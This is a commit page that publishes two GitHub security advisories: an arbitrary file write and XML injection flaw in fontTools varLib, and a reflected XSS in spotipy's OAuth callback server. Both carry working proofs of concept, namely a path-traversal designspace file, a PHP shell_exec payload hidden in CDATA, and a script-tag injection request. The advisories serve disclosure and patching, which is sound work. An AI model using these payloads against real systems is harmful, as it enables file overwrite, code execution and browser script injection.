Skip to content

Commit 91e7b20

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-768j-98cg-p3fv GHSA-r77h-rpp9-w2xm
1 parent db7c203 commit 91e7b20

File tree

2 files changed

+130
-0
lines changed

2 files changed

+130
-0
lines changed

advisories/github-reviewed/2025/12/GHSA-768j-98cg-p3fv/GHSA-768j-98cg-p3fv.json

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-768j-98cg-p3fv",
4+
"modified": "2025-12-01T19:07:00Z",
5+
"published": "2025-12-01T19:07:00Z",
6+
"aliases": [
7+
"CVE-2025-66034"
8+
],
9+
"summary": "fontTools is Vulnerable to Arbitrary File Write and XML injection in fontTools.varLib",
10+
"details": "## Summary\n\nThe `fonttools varLib` (or `python3 -m fontTools.varLib`) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the `main()` code path of `fontTools.varLib`, used by the fonttools varLib CLI and any code that invokes `fontTools.varLib.main()`.\n\nThe vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting `/etc/passwd`).\n\nOverall this allows attackers to:\n- Write font files to arbitrary locations on the filesystem\n- Overwrite configuration files\n- Corrupt application files and dependencies\n- Obtain remote code execution\n\nThe attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means.\n\n## Affected Lines\n\n`fontTools/varLib/__init__.py`\n```python\nfilename = vf.filename # Unsanitised filename\noutput_path = os.path.join(output_dir, filename) # Path traversal\nvf.save(output_path) # Arbitrary file write\n```\n\n## PoC\n1. Set up `malicious.designspace` and respective `source-*.ttf` files in a directory like `/Users/<username>/testing/demo/` (will impact relative file location within malicious.designspace)\n\n`setup.py`\n```python\n#!/usr/bin/env python3\nimport os\n\nfrom fontTools.fontBuilder import FontBuilder\nfrom fontTools.pens.ttGlyphPen import TTGlyphPen\n\ndef create_source_font(filename, weight=400):\n fb = FontBuilder(unitsPerEm=1000, isTTF=True)\n fb.setupGlyphOrder([\".notdef\"])\n fb.setupCharacterMap({})\n \n pen = TTGlyphPen(None)\n pen.moveTo((0, 0))\n pen.lineTo((500, 0))\n pen.lineTo((500, 500))\n pen.lineTo((0, 500))\n pen.closePath()\n \n fb.setupGlyf({\".notdef\": pen.glyph()})\n fb.setupHorizontalMetrics({\".notdef\": (500, 0)})\n fb.setupHorizontalHeader(ascent=800, descent=-200)\n fb.setupOS2(usWeightClass=weight)\n fb.setupPost()\n fb.setupNameTable({\"familyName\": \"Test\", \"styleName\": f\"Weight{weight}\"})\n fb.save(filename)\n\nif __name__ == '__main__':\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n create_source_font(\"source-light.ttf\", weight=100)\n create_source_font(\"source-regular.ttf\", weight=400)\n```\n\n`malicious.designspace`\n```xml\n<?xml version='1.0' encoding='UTF-8'?>\n<designspace format=\"5.0\">\n <axes>\n <axis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\"/>\n </axes>\n \n <sources>\n <source filename=\"source-light.ttf\" name=\"Light\">\n <location>\n <dimension name=\"Weight\" xvalue=\"100\"/>\n </location>\n </source>\n <source filename=\"source-regular.ttf\" name=\"Regular\">\n <location>\n <dimension name=\"Weight\" xvalue=\"400\"/>\n </location>\n </source>\n </sources>\n \n <!-- Filename can be arbitrarily set to any path on the filesystem -->\n <variable-fonts>\n <variable-font name=\"MaliciousFont\" filename=\"../../tmp/newarbitraryfile.json\">\n <axis-subsets>\n <axis-subset name=\"Weight\"/>\n </axis-subsets>\n </variable-font>\n </variable-fonts>\n</designspace>\n```\n\nOptional: You can put a file with any material within `../../tmp/newarbitraryfile.json` in advance, the contents in the file will be overwritten after running the setup script in the following step.\n\n2. Run the setup.py script to generate `source-*.tff` files required for the malicious.designspace file.\n```bash\npython3 setup.py\n```\n3. Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename\n```bash\nfonttools varLib malicious.designspace\n```\n4. Validate arbitrary file write was performed by looking at path assigned within malicious designspace\n```bash\ncat {{filename_location}}\n```\n5. After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload.\n\n`malicious2.designspace`\n```xml\n<?xml version='1.0' encoding='UTF-8'?>\n<designspace format=\"5.0\">\n\t<axes>\n <!-- XML injection occurs in labelname elements with CDATA sections -->\n\t <axis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\">\n\t <labelname xml:lang=\"en\"><![CDATA[<?php echo shell_exec(\"/usr/bin/touch /tmp/MEOW123\");?>]]]]><![CDATA[>]]></labelname>\n\t <labelname xml:lang=\"fr\">MEOW2</labelname>\n\t </axis>\n\t</axes>\n\t<axis tag=\"wght\" name=\"Weight\" minimum=\"100\" maximum=\"900\" default=\"400\"/>\n\t<sources>\n\t\t<source filename=\"source-light.ttf\" name=\"Light\">\n\t\t\t<location>\n\t\t\t\t<dimension name=\"Weight\" xvalue=\"100\"/>\n\t\t\t</location>\n\t\t</source>\n\t\t<source filename=\"source-regular.ttf\" name=\"Regular\">\n\t\t\t<location>\n\t\t\t\t<dimension name=\"Weight\" xvalue=\"400\"/>\n\t\t\t</location>\n\t\t</source>\n\t</sources>\n\t<variable-fonts>\n\t\t<variable-font name=\"MyFont\" filename=\"output.ttf\">\n\t\t\t<axis-subsets>\n\t\t\t\t<axis-subset name=\"Weight\"/>\n\t\t\t</axis-subsets>\n\t\t</variable-font>\n\t</variable-fonts>\n\t<instances>\n\t\t<instance name=\"Display Thin\" familyname=\"MyFont\" stylename=\"Thin\">\n\t\t\t<location><dimension name=\"Weight\" xvalue=\"100\"/></location>\n\t\t\t<labelname xml:lang=\"en\">Display Thin</labelname>\n\t\t</instance>\n\t</instances>\n</designspace>\n```\n\n6. When the program is run, we can show we control the contents in the new file\n```bash\nfonttools varLib malicious2.designspace -o file123\n```\nHere being outputted to a localised area ignoring filename presented in variable-font\n\n7. We can look inside file123 to validate user controlled injection\n```bash\ncat file123\n```\nto show `<?php echo shell_exec(\"/usr/bin/touch /tmp/MEOW123\");?>]]>`\n\n8. Executing the file and reading looking at the newly generated file\n```bash\nphp file123\nls -la /tmp/MEOW123\n```\nwe can see that the file was just created showing RCE.\n\n## Recommendations\n\n- Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "fonttools"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "4.33.0"
29+
},
30+
{
31+
"fixed": "4.60.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/fonttools/fonttools/security/advisories/GHSA-768j-98cg-p3fv"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66034"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/fonttools/fonttools/commit/a696d5ba93270d5954f98e7cab5ddca8a02c1e32"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/fonttools/fonttools"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-91"
59+
],
60+
"severity": "MODERATE",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2025-12-01T19:07:00Z",
63+
"nvd_published_at": "2025-11-29T01:16:02Z"
64+
}
65+
}

advisories/github-reviewed/2025/12/GHSA-r77h-rpp9-w2xm/GHSA-r77h-rpp9-w2xm.json

Lines changed: 65 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-r77h-rpp9-w2xm",
4+
"modified": "2025-12-01T19:07:26Z",
5+
"published": "2025-12-01T19:07:26Z",
6+
"aliases": [
7+
"CVE-2025-66040"
8+
],
9+
"summary": "Spotipy has a XSS vulnerability in its OAuth callback server",
10+
"details": "### Summary\nXSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user's browser during OAuth authentication.\n\n\n### Details\n**Vulnerable Code:** `spotipy/oauth2.py` lines 1238-1274 (RequestHandler.do_GET)\n\n**The Problem:**\nDuring OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the `error` URL parameter directly into HTML without sanitization.\n\n**Vulnerable code at line 1255:**\n```python\nstatus = f\"failed ({self.server.error})\"\n```\n\n**Then embedded in HTML at line 1265:**\n```python\nself._write(f\"\"\"<html>\n<body>\n<h1>Authentication status: {status}</h1>\n</body>\n</html>\"\"\")\n```\n\nThe `error` parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.\n\n**Attack Flow:**\n1. User starts OAuth authentication → local server runs on `http://127.0.0.1:8080`\n2. Attacker crafts malicious URL: `http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x`\n3. User visits URL → JavaScript executes in localhost origin\n\n\n### PoC\n\n**Simple Python Test:**\n```python\n#!/usr/bin/env python3\n# poc_xss.py - Demonstrates XSS in spotipy OAuth callback\n\nimport requests\nfrom spotipy.oauth2 import start_local_http_server\nimport threading\nimport time\n\n# Start vulnerable server in background\ndef start_server():\n server = start_local_http_server(8080)\n server.handle_request()\n\nthread = threading.Thread(target=start_server, daemon=True)\nthread.start()\ntime.sleep(2)\n\n# Send XSS payload\npayload = '<script>alert(\"XSS\")</script>'\nurl = f'http://127.0.0.1:8080/?error={payload}&state=test'\n\nresponse = requests.get(url)\nprint(f\"Status: {response.status_code}\")\nprint(f\"\\nHTML Response:\\n{response.text}\")\n\n# Check if vulnerable\nif payload in response.text:\n print(f\"\\n[!] VULNERABLE: Payload '{payload}' reflected without escaping!\")\nelse:\n print(\"\\n[+] Safe: Payload was sanitized\")\n```\n\n**Run it:**\n```bash\npip install spotipy requests\npython3 poc_xss.py\n```\n\n**Output shows:**\n```\nStatus: 200\nHTML Response:\n<html>\n<body>\n<h1>Authentication status: failed (<script>alert(\"XSS\")</script>)</h1>\n</body>\n</html>\n\n[!] VULNERABLE: Payload '<script>alert(\"XSS\")</script>' reflected without escaping!\n```\n\n**The Proof:**\n- Expected (safe): `&lt;script&gt;alert(\"XSS\")&lt;/script&gt;`\n- Actual (vulnerable): `<script>alert(\"XSS\")</script>`\n- The script tags are NOT escaped → XSS confirmed\n\n### Impact\n\n**Vulnerability Type:** Cross-Site Scripting (XSS) - CWE-79\n\n**Affected Users:** Anyone using spotipy's OAuth flow with localhost redirect URIs\n\n**Attack Complexity:** Medium-High\n- Requires timing (during brief OAuth window)\n- Localhost-only (127.0.0.1)\n- Requires user interaction (click malicious link)\n\n**Potential Impact:**\n- Execute JavaScript in localhost origin\n- Access other localhost services (port scanning, API calls)\n- Steal data from local web applications\n- Extract OAuth tokens from browser storage\n- Bypass CSRF protections on localhost endpoints\n\n**CVSS 3.1 Score:** 4.2 (Medium)\n- Attack Vector: Local\n- Attack Complexity: High\n- Privileges Required: None\n- User Interaction: Required\n- Scope: Unchanged\n- Confidentiality/Integrity: Low\n\n\n**Recommended Fix:**\n```python\nimport html\n\n# Line 1255 - apply HTML escaping\nif self.server.error:\n status = f\"failed ({html.escape(str(self.server.error))})\"\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "spotipy"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.25.2"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66040"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767"
50+
},
51+
{
52+
"type": "PACKAGE",
53+
"url": "https://github.com/spotipy-dev/spotipy"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-79"
59+
],
60+
"severity": "LOW",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2025-12-01T19:07:26Z",
63+
"nvd_published_at": "2025-11-27T00:15:55Z"
64+
}
65+
}

0 commit comments

Comments
 (0)